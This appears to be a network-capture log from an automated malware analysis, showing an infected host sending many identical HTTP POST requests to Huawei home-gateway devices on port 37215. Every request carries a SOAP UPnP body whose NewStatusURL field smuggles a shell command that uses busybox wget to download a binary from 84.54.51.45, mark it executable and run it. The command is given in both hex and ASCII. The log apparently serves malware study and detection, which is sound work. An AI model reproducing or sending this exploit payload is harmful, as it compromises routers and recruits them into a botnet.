                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            377192.168.2.1538472197.24.191.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782068968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            378192.168.2.1543048197.240.163.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782087088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            379192.168.2.1558856197.128.192.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782119989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            380192.168.2.1548450197.155.119.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782140970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            381192.168.2.1549338197.138.111.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782166958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            382192.168.2.1539332197.34.226.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782186985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            383192.168.2.1536338197.34.90.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782213926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            384192.168.2.1538498197.213.57.4837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782232046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            385192.168.2.1538556197.40.167.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782260895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            386192.168.2.1558942197.152.107.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782282114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 